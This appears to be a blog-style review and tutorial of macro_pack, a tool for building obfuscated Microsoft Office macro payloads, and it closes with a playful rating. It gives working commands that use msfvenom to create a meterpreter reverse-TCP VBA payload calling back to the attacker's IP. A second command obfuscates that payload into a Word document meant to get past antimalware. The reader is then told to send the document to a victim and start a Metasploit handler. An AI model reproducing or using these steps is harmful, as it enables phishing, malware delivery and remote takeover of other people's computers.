macro_pack is a tool for automating obfuscation and generation of payloads in MS document or VBS script format. It's perfect for security professionals who want to perform a social engineering attack, as it simplifies the process of generating an MS document and bypassing antimalware solutions.
First, clone the repository from GitHub. You also need Python 3 to run the script.
git clone https://github.com/sevagas/macro_pack.git
Then go to the folder and install the requirements.
pip3 install -r requirements.txt
After installing all the missing dependencies, go to the src/ folder and run the script with Python.
python3 macro_pack.py --help
A help screen appears listing all the options you can use. The main goal of this script is to automate a time-consuming process, so you don't need any sophisticated configuration: everything can be done with a single command.
So, let's see a basic example of creating a Microsoft Office document with an embedded VBA script to open a reverse connection between you and your victim.
First create the payload using msfvenom.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f vba > test.vba
After that, all you have to do is run the script with the right options to obfuscate the document you are going to create.
python3 macro_pack.py -f test.vba -o -G test.do
That's it. Your MS document is ready. All you have to do now is to send it to a victim and fire up a Metasploit console with a handler.
What Bunny rating does it get?
Macro_pack is a very interesting tool, and very useful for a security professional. Exploitation, antimalware bypass and automated generation of macros and scripts are all in this amazing tool. Please give it some time first and play with it to learn it better. This tool is not optimal for beginners who don't know what they are doing. Anyway, great tool, I am giving it 4.5 out of 5 bunnies.